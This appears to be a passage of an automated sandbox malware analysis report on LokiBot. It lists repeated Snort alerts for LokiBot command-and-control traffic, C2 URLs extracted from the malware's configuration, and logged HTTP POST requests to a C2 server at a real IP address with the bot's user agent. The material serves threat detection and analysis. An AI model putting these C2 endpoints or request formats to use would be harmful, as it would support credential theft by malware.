Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49785 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49786 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49786 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49786 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49787 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49787 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49787 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49788 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49788 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49788 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49789 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49789 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49789 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49791 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49791 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49791 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49792 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49792 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49792 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49793 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49793 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49793 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49794 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49794 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49794 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49795 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49795 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49795 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49796 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49796 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49796 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49797 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49797 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49797 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49798 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49798 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49798 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49799 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49799 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49799 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49800 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49800 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49800 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49801 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49801 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49801 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49802 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49802 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49802 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49803 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49803 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49803 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49804 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49804 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49804 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49805 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49805 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49805 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49806 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49806 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49806 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49807 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49807 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49807 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49808 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49808 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49808 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49809 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49809 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49809 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49810 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49810 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49810 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49811 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49811 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49811 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49812 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49812 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49812 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49813 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49813 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49813 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49814 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49814 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49814 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49815 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49815 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49815 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49816 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49816 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49816 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49817 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49817 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49817 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49818 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49818 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49818 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49819 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49819 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49819 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49820 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49820 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49820 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49821 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49821 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49821 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49822 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49822 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49822 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49823 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49823 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49823 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49824 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49824 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49824 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49825 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49825 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49825 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49826 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49826 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49826 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49827 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49827 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49827 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49828 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49828 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49828 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49829 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49829 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49829 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49830 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49830 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49830 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49831 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49831 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49831 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49832 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49832 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49832 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49833 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49833 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49833 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49834 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49834 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49834 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49835 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49835 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49835 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49836 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49836 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49836 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49837 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49837 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49837 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49838 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49838 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49838 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49839 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49839 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49839 -> 45.77.223.48:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://45.77.223.48/~blog/?ajax=ee

Source: Joe Sandbox View

ASN Name: AS-CHOOPAUS AS-CHOOPAUS

Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
